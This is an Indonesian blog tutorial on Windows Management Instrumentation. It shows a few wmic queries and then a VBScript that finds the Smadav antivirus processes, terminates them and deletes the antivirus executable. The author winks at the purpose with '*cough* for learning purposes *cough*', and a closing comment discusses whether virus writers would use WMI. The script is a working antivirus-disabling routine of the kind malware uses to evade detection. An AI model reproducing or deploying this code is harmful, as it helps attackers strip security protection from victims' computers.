Beberapa hari ini saya lagi tertarik dengan yang namanya WMI (Windows Management Instrumentation). Setelah ngubek2 MSDN dan googling sedikit, akhirnya ketemu beberapa referensi. Ok, langsung saja untuk percobaan kali ini, digunakan Windows® XP SP3. Jalankan WMI command line dengan memilih menu Start -> Run -> wmic. Ketika dijalankan pertama kali, wmic akan melakukan proses instalasi. Nah, setelah berada pada prompt wmic, kita bisa menjalankan instruksi yang diinginkan. Contohnya seperti ini:
wmic:root\cli>bios get name Name Phoenix ROM BIOS PLUS Version 1.10 A02 wmic:root\cli>process where name="foobar2000.exe" get executablepath,processid ExecutablePath ProcessId H:\Program Files\multimedia\foobar2000\foobar2000.exe 1544 wmic:root\cli>
Untuk lebih jelasnya, beberapa class yang bisa digunakan bisa dibaca pada bagian referensi. Setelah bermain-main dengan wmic, tiba saatnya warm-up code. Untuk pengujian kali ini, kita akan menggunakan objek WMI untuk mematikan proses smadav dan bukan hanya itu, kita akan menghapus smadav *cough* untuk tujuan pembelajaran *cough*. Berikut ini kodenya:
set sysobj = createobject("scripting.filesystemobject")
set wmiobj = getobject("winmgmts:{impersonationLevel=impersonate}!\\.\root\cimv2")
set target = wmiobj.execquery("select * from win32_process where name='SM?RTP.exe'")
'-- matikan proses smadav (rtp dan scanner)
'-- dan simpan pathnya ke variabel fpath
for each victim in target
fpath = victim.ExecutablePath
victim.Terminate(0)
next
'-- istirahat sebentar dan hapus smadav
wscript.sleep 1000
if sysobj.fileexists(fpath) then sysobj.deletefile(fpath)
Ingat, kode di atas disimpan menggunakan format unicode soalnya nama smadav menggunakan unicode. ok, sekian dulu tutorial singkat kali ini. Terima kasih kepada: Tuhan Yang Maha Esa, TKP Crew and you ;)
referensi: MSDN: WMI Win32 Classes
tp kyanya g bkalan di pke vxer, males bawa2 WMI di virusnya :P
kecuali menjadi fitur yg optional. wekekeke